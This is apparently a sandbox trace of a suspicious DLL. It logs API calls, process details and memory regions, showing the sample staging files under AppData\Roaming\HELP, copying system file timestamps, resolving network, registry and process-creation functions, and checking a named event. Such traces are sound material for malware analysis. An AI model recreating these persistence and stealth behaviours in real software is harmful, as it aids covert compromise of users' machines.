[0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.407] SetLastError (dwErrCode=0x0) [0032.407] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.408] SetLastError (dwErrCode=0x0) [0032.408] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.409] GetLastError () returned 0x0 [0032.409] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.410] GetLastError () returned 0x0 [0032.410] SetLastError (dwErrCode=0x0) [0032.411] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.411] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.411] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.412] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef868 | out: lpSystemTimeAsFileTime=0x2ef868*(dwLowDateTime=0xe10a15d0, dwHighDateTime=0x1d3dfba)) [0032.412] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef7a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.412] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef688, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.412] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetLastError () returned 0x0 [0032.413] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.413] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.413] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.413] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.413] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.413] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.413] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.413] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.413] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.413] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.413] GetLastError () returned 0xb7 [0032.413] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.413] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.413] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.413] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.414] wsprintfA (in: param_1=0x2ef508, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.414] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.414] wsprintfA (in: param_1=0x2ef404, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.414] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.414] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.414] CloseHandle (hObject=0x74) returned 1 [0032.414] GetLastError () returned 0x0 [0032.414] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.414] GetLastError () returned 0x0 [0032.414] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.414] GetSystemDirectoryA (in: lpBuffer=0x2ef508, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.414] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.414] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.414] CloseHandle (hObject=0x74) returned 1 [0032.415] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.415] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.415] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.416] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.416] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.416] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.416] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.416] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.417] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.417] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.417] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.418] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.418] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.418] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.418] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.418] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.418] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.419] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.419] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.419] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.419] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.419] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.419] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.419] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.419] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.421] HeapDestroy (hHeap=0x370000) returned 1 Process: id = "22" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f920" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1065 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1066 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1067 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1068 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1069 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1070 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1071 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1072 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1073 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1074 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1075 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1076 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1077 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1078 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1079 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1080 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1081 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1082 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1083 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1084 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1085 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1086 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1087 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1088 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1089 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1090 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1091 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1092 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1093 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1094 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1095 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1096 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1097 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1098 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1099 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1100 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1101 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1102 start_va = 0x350000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1103 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1104 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1105 start_va = 0x1200000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 50 os_tid = 0xb5c [0032.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f4cc | out: lpSystemTimeAsFileTime=0x22f4cc*(dwLowDateTime=0xe11139f0, dwHighDateTime=0x1d3dfba)) [0032.456] GetCurrentProcessId () returned 0xb58 [0032.456] GetCurrentThreadId () returned 0xb5c [0032.456] GetTickCount () returned 0x17454 [0032.457] QueryPerformanceCounter (in: lpPerformanceCount=0x22f4c4 | out: lpPerformanceCount=0x22f4c4*=363880830) returned 1 [0032.457] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.457] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.457] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.457] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.457] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.457] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.457] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.458] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.458] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.458] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.458] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.458] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.458] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.459] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.459] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.459] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.459] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.459] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.459] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.459] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.459] GetCurrentThreadId () returned 0xb5c 